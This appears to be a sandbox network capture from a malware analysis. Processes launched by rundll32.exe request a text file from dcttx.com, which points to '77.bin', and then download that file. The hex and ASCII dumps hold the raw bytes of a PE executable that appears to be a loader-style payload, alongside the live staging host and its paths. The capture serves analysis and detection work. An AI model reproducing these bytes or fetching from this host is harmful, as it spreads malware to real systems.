                            2024-12-22 08:29:05 UTC16384INData Raw: 00 dd 5d f8 dd 45 f8 59 dd 45 08 59 da e9 df e0 f6 c4 44 7a 0e 56 53 e8 18 40 00 00 dd 45 f8 59 59 eb 22 f6 c3 20 75 ed dd 45 f8 53 83 ec 10 dd 5c 24 08 dd 45 08 dd 1c 24 6a 0c 6a 10 e8 9d 3d 00 00 83 c4 1c 5e 5b c9 c3 6a 0c 68 a0 7b 41 00 e8 7e 1f 00 00 6a 0e e8 47 42 00 00 59 83 65 fc 00 8b 75 08 8b 4e 04 85 c9 74 2f a1 b4 ae 41 00 ba b0 ae 41 00 89 45 e4 85 c0 74 11 39 08 75 2c 8b 48 04 89 4a 04 50 e8 a0 f0 ff ff 59 ff 76 04 e8 97 f0 ff ff 59 83 66 04 00 c7 45 fc fe ff ff ff e8 0a 00 00 00 e8 6d 1f 00 00 c3 8b d0 eb c5 6a 0e e8 13 41 00 00 59 c3 cc cc cc cc cc cc cc cc cc cc 8b 54 24 04 8b 4c 24 08 f7 c2 03 00 00 00 75 3c 8b 02 3a 01 75 2e 0a c0 74 26 3a 61 01 75 25 0a e4 74 1d c1 e8 10 3a 41 02 75 19 0a c0 74 11 3a 61 03 75 10 83 c1 04 83 c2 04 0a e4
                            Data Ascii: ]EYEYDzVS@EYY" uES\$E$jj=^[jh{A~jGBYeuNt/AAEt9u,HJPYvYfEmjAYT$L$u<:u.t&:au%t:Aut:au
                            2024-12-22 08:29:05 UTC16384INData Raw: 07 00 00 83 c4 0c 81 ea fe 03 00 00 8b 45 10 89 10 5d c3 8b ff 55 8b ec 51 9b dd 7d fc 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 dd 7d fc db e2 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 9b d9 7d fc 8b 45 0c 8b 4d 08 23 4d 0c f7 d0 66 23 45 fc 66 0b c1 0f b7 c0 89 45 0c d9 6d 0c 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 51 8a 4d 08 f6 c1 01 74 0a db 2d 30 93 41 00 db 5d 08 9b f6 c1 08 74 10 9b df e0 db 2d 30 93 41 00 dd 5d f8 9b 9b df e0 f6 c1 10 74 0a db 2d 3c 93 41 00 dd 5d f8 9b f6 c1 04 74 09 d9 ee d9 e8 de f1 dd d8 9b f6 c1 20 74 06 d9 eb dd 5d f8 9b c9 c3 6a 08 68 50 7c 41 00 e8 10 df ff ff 33 c0 39 05 dc eb 41 00 74 56 f6 45 08 40 74 48 39 05 48 93 41 00 74 40 89 45 fc 0f ae 55 08 eb 2e 8b 45 ec 8b 00 8b 00 3d 05 00 00 c0 74 0a 3d 1d 00 00 c0 74 03 33 c0 c3 33 c0 40
                            Data Ascii: E]UQ}EUQ}EUQ}EM#Mf#EfEmEUQQMt-0A]t-0A]t-<A]t t]jhP|A39AtVE@tH9HAt@EU.E=t=t33@
                            2024-12-22 08:29:05 UTC16384INData Raw: ff ff ff b6 84 00 00 00 e8 1f 71 ff ff ff b6 88 00 00 00 e8 14 71 ff ff ff b6 8c 00 00 00 e8 09 71 ff ff ff b6 90 00 00 00 e8 fe 70 ff ff ff b6 94 00 00 00 e8 f3 70 ff ff ff b6 98 00 00 00 e8 e8 70 ff ff ff b6 9c 00 00 00 e8 dd 70 ff ff ff b6 a0 00 00 00 e8 d2 70 ff ff ff b6 a4 00 00 00 e8 c7 70 ff ff ff b6 a8 00 00 00 e8 bc 70 ff ff ff b6 bc 00 00 00 e8 b1 70 ff ff ff b6 c0 00 00 00 e8 a6 70 ff ff ff b6 c4 00 00 00 e8 9b 70 ff ff ff b6 c8 00 00 00 e8 90 70 ff ff ff b6 cc 00 00 00 e8 85 70 ff ff 83 c4 40 ff b6 d0 00 00 00 e8 77 70 ff ff ff b6 b8 00 00 00 e8 6c 70 ff ff ff b6 d8 00 00 00 e8 61 70 ff ff ff b6 dc 00 00 00 e8 56 70 ff ff ff b6 e0 00 00 00 e8 4b 70 ff ff ff b6 e4 00 00 00 e8 40 70 ff ff ff b6 e8 00 00 00 e8 35 70 ff ff ff b6 ec 00 00 00 e8 2a
                            Data Ascii: qqqpppppppppppp@wplpapVpKp@p5p*
                            2024-12-22 08:29:05 UTC16384INData Raw: 75 f8 53 ff 75 14 ff 75 10 ff 75 0c 56 e8 9f fb ff ff 83 c4 20 e8 3c 5b ff ff 83 b8 94 00 00 00 00 74 05 e8 59 84 ff ff 5f 5e 5b c9 c3 8b ff 55 8b ec 56 ff 75 08 8b f1 e8 ca 30 ff ff c7 06 88 77 41 00 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 53 56 57 e8 ff 5a ff ff 83 b8 0c 02 00 00 00 8b 45 18 8b 4d 08 bf 63 73 6d e0 be ff ff ff 1f bb 22 05 93 19 75 20 8b 11 3b d7 74 1a 81 fa 26 00 00 80 74 12 8b 10 23 d6 3b d3 72 0a f6 40 20 01 0f 85 93 00 00 00 f6 41 04 66 74 23 83 78 04 00 0f 84 83 00 00 00 83 7d 1c 00 75 7d 6a ff 50 ff 75 14 ff 75 0c e8 7a f4 ff ff 83 c4 10 eb 6a 83 78 0c 00 75 12 8b 10 23 d6 81 fa 21 05 93 19 72 58 83 78 1c 00 74 52 39 39 75 32 83 79 10 03 72 2c 39 59 14 76 27 8b 51 1c 8b 52 08 85 d2 74 1d 0f b6 75 24 56 ff 75 20 ff 75 1c 50 ff 75 14 ff
                            Data Ascii: uSuuuV <[tY_^[UVu0wA^]USVWZEMcsm"u ;t&t#;r@ Aft#x}u}jPuuzjxu#!rXxtR99u2yr,9Yv'QRtu$Vu uPu
                            2024-12-22 08:29:05 UTC16384INData Raw: 00 00 00 ff ff ff ff b0 40 41 00 00 00 00 00 bb 40 41 00 01 00 00 00 c6 40 41 00 02 00 00 00 d1 40 41 00 03 00 00 00 de 40 41 00 04 00 00 00 ec 40 41 00 05 00 00 00 f9 40 41 00 06 00 00 00 06 41 41 00 07 00 00 00 13 41 41 00 07 00 00 00 1e 41 41 00 09 00 00 00 2c 41 41 00 0a 00 00 00 3a 41 41 00 0b 00 00 00 48 41 41 00 22 05 93 19 0d 00 00 00 e0 7e 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 80 41 41 00 00 00 00 00 8b 41 41 00 22 05 93 19 02 00 00 00 6c 7f 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff c0 41 41 00 ff ff ff ff cb 41 41 00 22 05 93 19 02 00 00 00 a0 7f 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff f0 41 41 00
                            Data Ascii: @A@A@A@A@A@A@AAAAAAA,AA:AAHAA"~AAAAA"lAAAAA"AAA
                            2024-12-22 08:29:05 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii:
                            2024-12-22 08:29:05 UTC9507INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii:


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            3 | 192.168.2.4 | 49734 | 38.147.186.138 | 443 | 6156 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-12-22 08:29:04 UTC | 57 | OUT | GET /19/77.bin HTTP/1.1
                            accept: */*
                            host: dcttx.com
                            2024-12-22 08:29:05 UTC | 291 | IN | HTTP/1.1 200 OK
                            Server: nginx
                            Date: Sun, 22 Dec 2024 08:29:04 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 140288
                            Last-Modified: Thu, 19 Dec 2024 15:27:56 GMT
                            Connection: close
                            ETag: "67643b7c-22400"
                            Strict-Transport-Security: max-age=31536000
                            Accept-Ranges: bytes
                            2024-12-22 08:29:05 UTC16093INData Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 50 05 00 20 02 00 ff d0 c3 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e2 0c 41 1d a6 6d 2f 4e a6 6d 2f 4e a6 6d 2f 4e c9 1b b1 4e b2 6d 2f 4e c9 1b 85 4e d0 6d 2f 4e c9 1b 84 4e 8a 6d 2f 4e af 15 bc 4e ad 6d 2f 4e a6 6d 2e 4e 29 6d 2f 4e c9 1b 80 4e ab 6d 2f 4e c9 1b b2 4e a7 6d 2f 4e 52 69 63 68 a6 6d 2f 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 74 12 b6 66 00 00 00 00 00 00 00 00 e0 00 02
                            Data Ascii: MZERXP @!L!This program cannot be run in DOS mode.$Am/Nm/Nm/NNm/NNm/NNm/NNm/Nm.N)m/NNm/NNm/NRichm/NPELtf
                            2024-12-22 08:29:05 UTC16384INData Raw: 08 89 4b 04 89 9e 80 01 00 00 ff 86 78 01 00 00 57 89 9e 7c 01 00 00 ff 15 24 50 41 00 b8 01 00 00 00 5f 5b 8b e5 5d c3 b9 01 00 00 00 53 8d be 98 00 00 00 89 4e 30 c7 46 34 03 00 00 00 89 46 38 89 4e 3c e8 5a d5 ff ff 85 c0 75 0d 8b 13 53 50 8b 02 50 ff 15 e4 50 41 00 5f 33 c0 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b f0 ff 15 4c 50 41 00 8b d8 8b 46 64 83 f8 03 0f 84 cf 00 00 00 8d be 5c 01 00 00 57 e8 0b ec ff ff 8b 4e 64 83 f9 01 74 0b 8b 56 64 85 d2 0f 85 aa 00 00 00 c7 46 64 02 00 00 00 c7 07 00 00 00 00 8b c3 e8 b4 01 00 00 8b 46 60 85 c0 74 20 83 7e 3c 00 74 13 8b 4e 40 6a 00 6a 10 68 40 74 41 00 51 ff 15 f4 51 41 00 c7 46 60 00 00 00 00 83 7e 30 00 74 22 8b 56 48 52 e8 7e ec ff ff 8b 46 04 83 c4 04 50 ff 15 38
                            Data Ascii: KxW|$PA_[]SN0F4F8N<ZuSPPPA_3[]SVWLPAFd\WNdtVdFdF`t ~<tN@jjh@tAQQAF`~0t"VHR~FP8
                            2024-12-22 08:29:05 UTC16384INData Raw: 00 dd 5d f8 dd 45 f8 59 dd 45 08 59 da e9 df e0 f6 c4 44 7a 0e 56 53 e8 18 40 00 00 dd 45 f8 59 59 eb 22 f6 c3 20 75 ed dd 45 f8 53 83 ec 10 dd 5c 24 08 dd 45 08 dd 1c 24 6a 0c 6a 10 e8 9d 3d 00 00 83 c4 1c 5e 5b c9 c3 6a 0c 68 a0 7b 41 00 e8 7e 1f 00 00 6a 0e e8 47 42 00 00 59 83 65 fc 00 8b 75 08 8b 4e 04 85 c9 74 2f a1 b4 ae 41 00 ba b0 ae 41 00 89 45 e4 85 c0 74 11 39 08 75 2c 8b 48 04 89 4a 04 50 e8 a0 f0 ff ff 59 ff 76 04 e8 97 f0 ff ff 59 83 66 04 00 c7 45 fc fe ff ff ff e8 0a 00 00 00 e8 6d 1f 00 00 c3 8b d0 eb c5 6a 0e e8 13 41 00 00 59 c3 cc cc cc cc cc cc cc cc cc cc 8b 54 24 04 8b 4c 24 08 f7 c2 03 00 00 00 75 3c 8b 02 3a 01 75 2e 0a c0 74 26 3a 61 01 75 25 0a e4 74 1d c1 e8 10 3a 41 02 75 19 0a c0 74 11 3a 61 03 75 10 83 c1 04 83 c2 04 0a e4
                            Data Ascii: ]EYEYDzVS@EYY" uES\$E$jj=^[jh{A~jGBYeuNt/AAEt9u,HJPYvYfEmjAYT$L$u<:u.t&:au%t:Aut:au
                            2024-12-22 08:29:05 UTC16384INData Raw: 07 00 00 83 c4 0c 81 ea fe 03 00 00 8b 45 10 89 10 5d c3 8b ff 55 8b ec 51 9b dd 7d fc 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 dd 7d fc db e2 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 9b d9 7d fc 8b 45 0c 8b 4d 08 23 4d 0c f7 d0 66 23 45 fc 66 0b c1 0f b7 c0 89 45 0c d9 6d 0c 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 51 8a 4d 08 f6 c1 01 74 0a db 2d 30 93 41 00 db 5d 08 9b f6 c1 08 74 10 9b df e0 db 2d 30 93 41 00 dd 5d f8 9b 9b df e0 f6 c1 10 74 0a db 2d 3c 93 41 00 dd 5d f8 9b f6 c1 04 74 09 d9 ee d9 e8 de f1 dd d8 9b f6 c1 20 74 06 d9 eb dd 5d f8 9b c9 c3 6a 08 68 50 7c 41 00 e8 10 df ff ff 33 c0 39 05 dc eb 41 00 74 56 f6 45 08 40 74 48 39 05 48 93 41 00 74 40 89 45 fc 0f ae 55 08 eb 2e 8b 45 ec 8b 00 8b 00 3d 05 00 00 c0 74 0a 3d 1d 00 00 c0 74 03 33 c0 c3 33 c0 40
                            Data Ascii: E]UQ}EUQ}EUQ}EM#Mf#EfEmEUQQMt-0A]t-0A]t-<A]t t]jhP|A39AtVE@tH9HAt@EU.E=t=t33@
                            2024-12-22 08:29:05 UTC16384INData Raw: ff ff ff b6 84 00 00 00 e8 1f 71 ff ff ff b6 88 00 00 00 e8 14 71 ff ff ff b6 8c 00 00 00 e8 09 71 ff ff ff b6 90 00 00 00 e8 fe 70 ff ff ff b6 94 00 00 00 e8 f3 70 ff ff ff b6 98 00 00 00 e8 e8 70 ff ff ff b6 9c 00 00 00 e8 dd 70 ff ff ff b6 a0 00 00 00 e8 d2 70 ff ff ff b6 a4 00 00 00 e8 c7 70 ff ff ff b6 a8 00 00 00 e8 bc 70 ff ff ff b6 bc 00 00 00 e8 b1 70 ff ff ff b6 c0 00 00 00 e8 a6 70 ff ff ff b6 c4 00 00 00 e8 9b 70 ff ff ff b6 c8 00 00 00 e8 90 70 ff ff ff b6 cc 00 00 00 e8 85 70 ff ff 83 c4 40 ff b6 d0 00 00 00 e8 77 70 ff ff ff b6 b8 00 00 00 e8 6c 70 ff ff ff b6 d8 00 00 00 e8 61 70 ff ff ff b6 dc 00 00 00 e8 56 70 ff ff ff b6 e0 00 00 00 e8 4b 70 ff ff ff b6 e4 00 00 00 e8 40 70 ff ff ff b6 e8 00 00 00 e8 35 70 ff ff ff b6 ec 00 00 00 e8 2a
                            Data Ascii: qqqpppppppppppp@wplpapVpKp@p5p*
                            2024-12-22 08:29:05 UTC16384INData Raw: 75 f8 53 ff 75 14 ff 75 10 ff 75 0c 56 e8 9f fb ff ff 83 c4 20 e8 3c 5b ff ff 83 b8 94 00 00 00 00 74 05 e8 59 84 ff ff 5f 5e 5b c9 c3 8b ff 55 8b ec 56 ff 75 08 8b f1 e8 ca 30 ff ff c7 06 88 77 41 00 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 53 56 57 e8 ff 5a ff ff 83 b8 0c 02 00 00 00 8b 45 18 8b 4d 08 bf 63 73 6d e0 be ff ff ff 1f bb 22 05 93 19 75 20 8b 11 3b d7 74 1a 81 fa 26 00 00 80 74 12 8b 10 23 d6 3b d3 72 0a f6 40 20 01 0f 85 93 00 00 00 f6 41 04 66 74 23 83 78 04 00 0f 84 83 00 00 00 83 7d 1c 00 75 7d 6a ff 50 ff 75 14 ff 75 0c e8 7a f4 ff ff 83 c4 10 eb 6a 83 78 0c 00 75 12 8b 10 23 d6 81 fa 21 05 93 19 72 58 83 78 1c 00 74 52 39 39 75 32 83 79 10 03 72 2c 39 59 14 76 27 8b 51 1c 8b 52 08 85 d2 74 1d 0f b6 75 24 56 ff 75 20 ff 75 1c 50 ff 75 14 ff
                            Data Ascii: uSuuuV <[tY_^[UVu0wA^]USVWZEMcsm"u ;t&t#;r@ Aft#x}u}jPuuzjxu#!rXxtR99u2yr,9Yv'QRtu$Vu uPu
                            2024-12-22 08:29:05 UTC16384INData Raw: 00 00 00 ff ff ff ff b0 40 41 00 00 00 00 00 bb 40 41 00 01 00 00 00 c6 40 41 00 02 00 00 00 d1 40 41 00 03 00 00 00 de 40 41 00 04 00 00 00 ec 40 41 00 05 00 00 00 f9 40 41 00 06 00 00 00 06 41 41 00 07 00 00 00 13 41 41 00 07 00 00 00 1e 41 41 00 09 00 00 00 2c 41 41 00 0a 00 00 00 3a 41 41 00 0b 00 00 00 48 41 41 00 22 05 93 19 0d 00 00 00 e0 7e 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 80 41 41 00 00 00 00 00 8b 41 41 00 22 05 93 19 02 00 00 00 6c 7f 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff c0 41 41 00 ff ff ff ff cb 41 41 00 22 05 93 19 02 00 00 00 a0 7f 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff f0 41 41 00
                            Data Ascii: @A@A@A@A@A@A@AAAAAAA,AA:AAHAA"~AAAAA"lAAAAA"AAA
                            2024-12-22 08:29:05 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii:
                            2024-12-22 08:29:05 UTC9507INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii:


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            4 | 192.168.2.4 | 49733 | 38.147.186.138 | 443 | 1900 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-12-22 08:29:04 UTC | 56 | OUT | GET /19/7.txt HTTP/1.1
                            accept: */*
                            host: dcttx.com
                            2024-12-22 08:29:05 UTC | 270 | IN | HTTP/1.1 200 OK
                            Server: nginx
                            Date: Sun, 22 Dec 2024 08:29:04 GMT
                            Content-Type: text/plain
                            Content-Length: 27
                            Last-Modified: Thu, 19 Dec 2024 15:28:55 GMT
                            Connection: close
                            ETag: "67643bb7-1b"
                            Strict-Transport-Security: max-age=31536000
                            Accept-Ranges: bytes
                            2024-12-22 08:29:05 UTC | 27 | IN | Data Raw: 68 74 74 70 73 3a 2f 2f 64 63 74 74 78 2e 63 6f 6d 2f 31 39 2f 37 37 2e 62 69 6e
                            Data Ascii: https://dcttx.com/19/77.bin


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            5 | 192.168.2.4 | 49735 | 38.147.186.138 | 443 | 1900 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-12-22 08:29:06 UTC | 57 | OUT | GET /19/77.bin HTTP/1.1
                            accept: */*
                            host: dcttx.com
                            2024-12-22 08:29:07 UTC | 291 | IN | HTTP/1.1 200 OK
                            Server: nginx
                            Date: Sun, 22 Dec 2024 08:29:07 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 140288
                            Last-Modified: Thu, 19 Dec 2024 15:27:56 GMT
                            Connection: close
                            ETag: "67643b7c-22400"
                            Strict-Transport-Security: max-age=31536000
                            Accept-Ranges: bytes
                            2024-12-22 08:29:07 UTC16093INData Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 50 05 00 20 02 00 ff d0 c3 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e2 0c 41 1d a6 6d 2f 4e a6 6d 2f 4e a6 6d 2f 4e c9 1b b1 4e b2 6d 2f 4e c9 1b 85 4e d0 6d 2f 4e c9 1b 84 4e 8a 6d 2f 4e af 15 bc 4e ad 6d 2f 4e a6 6d 2e 4e 29 6d 2f 4e c9 1b 80 4e ab 6d 2f 4e c9 1b b2 4e a7 6d 2f 4e 52 69 63 68 a6 6d 2f 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 74 12 b6 66 00 00 00 00 00 00 00 00 e0 00 02
                            Data Ascii: MZERXP @!L!This program cannot be run in DOS mode.$Am/Nm/Nm/NNm/NNm/NNm/NNm/Nm.N)m/NNm/NNm/NRichm/NPELtf
                            2024-12-22 08:29:07 UTC16384INData Raw: 08 89 4b 04 89 9e 80 01 00 00 ff 86 78 01 00 00 57 89 9e 7c 01 00 00 ff 15 24 50 41 00 b8 01 00 00 00 5f 5b 8b e5 5d c3 b9 01 00 00 00 53 8d be 98 00 00 00 89 4e 30 c7 46 34 03 00 00 00 89 46 38 89 4e 3c e8 5a d5 ff ff 85 c0 75 0d 8b 13 53 50 8b 02 50 ff 15 e4 50 41 00 5f 33 c0 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b f0 ff 15 4c 50 41 00 8b d8 8b 46 64 83 f8 03 0f 84 cf 00 00 00 8d be 5c 01 00 00 57 e8 0b ec ff ff 8b 4e 64 83 f9 01 74 0b 8b 56 64 85 d2 0f 85 aa 00 00 00 c7 46 64 02 00 00 00 c7 07 00 00 00 00 8b c3 e8 b4 01 00 00 8b 46 60 85 c0 74 20 83 7e 3c 00 74 13 8b 4e 40 6a 00 6a 10 68 40 74 41 00 51 ff 15 f4 51 41 00 c7 46 60 00 00 00 00 83 7e 30 00 74 22 8b 56 48 52 e8 7e ec ff ff 8b 46 04 83 c4 04 50 ff 15 38
                            Data Ascii: KxW|$PA_[]SN0F4F8N<ZuSPPPA_3[]SVWLPAFd\WNdtVdFdF`t ~<tN@jjh@tAQQAF`~0t"VHR~FP8
                            2024-12-22 08:29:07 UTC16384INData Raw: 00 dd 5d f8 dd 45 f8 59 dd 45 08 59 da e9 df e0 f6 c4 44 7a 0e 56 53 e8 18 40 00 00 dd 45 f8 59 59 eb 22 f6 c3 20 75 ed dd 45 f8 53 83 ec 10 dd 5c 24 08 dd 45 08 dd 1c 24 6a 0c 6a 10 e8 9d 3d 00 00 83 c4 1c 5e 5b c9 c3 6a 0c 68 a0 7b 41 00 e8 7e 1f 00 00 6a 0e e8 47 42 00 00 59 83 65 fc 00 8b 75 08 8b 4e 04 85 c9 74 2f a1 b4 ae 41 00 ba b0 ae 41 00 89 45 e4 85 c0 74 11 39 08 75 2c 8b 48 04 89 4a 04 50 e8 a0 f0 ff ff 59 ff 76 04 e8 97 f0 ff ff 59 83 66 04 00 c7 45 fc fe ff ff ff e8 0a 00 00 00 e8 6d 1f 00 00 c3 8b d0 eb c5 6a 0e e8 13 41 00 00 59 c3 cc cc cc cc cc cc cc cc cc cc 8b 54 24 04 8b 4c 24 08 f7 c2 03 00 00 00 75 3c 8b 02 3a 01 75 2e 0a c0 74 26 3a 61 01 75 25 0a e4 74 1d c1 e8 10 3a 41 02 75 19 0a c0 74 11 3a 61 03 75 10 83 c1 04 83 c2 04 0a e4
                            Data Ascii: ]EYEYDzVS@EYY" uES\$E$jj=^[jh{A~jGBYeuNt/AAEt9u,HJPYvYfEmjAYT$L$u<:u.t&:au%t:Aut:au
                            2024-12-22 08:29:07 UTC16384INData Raw: 07 00 00 83 c4 0c 81 ea fe 03 00 00 8b 45 10 89 10 5d c3 8b ff 55 8b ec 51 9b dd 7d fc 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 dd 7d fc db e2 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 9b d9 7d fc 8b 45 0c 8b 4d 08 23 4d 0c f7 d0 66 23 45 fc 66 0b c1 0f b7 c0 89 45 0c d9 6d 0c 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 51 8a 4d 08 f6 c1 01 74 0a db 2d 30 93 41 00 db 5d 08 9b f6 c1 08 74 10 9b df e0 db 2d 30 93 41 00 dd 5d f8 9b 9b df e0 f6 c1 10 74 0a db 2d 3c 93 41 00 dd 5d f8 9b f6 c1 04 74 09 d9 ee d9 e8 de f1 dd d8 9b f6 c1 20 74 06 d9 eb dd 5d f8 9b c9 c3 6a 08 68 50 7c 41 00 e8 10 df ff ff 33 c0 39 05 dc eb 41 00 74 56 f6 45 08 40 74 48 39 05 48 93 41 00 74 40 89 45 fc 0f ae 55 08 eb 2e 8b 45 ec 8b 00 8b 00 3d 05 00 00 c0 74 0a 3d 1d 00 00 c0 74 03 33 c0 c3 33 c0 40
                            Data Ascii: E]UQ}EUQ}EUQ}EM#Mf#EfEmEUQQMt-0A]t-0A]t-<A]t t]jhP|A39AtVE@tH9HAt@EU.E=t=t33@
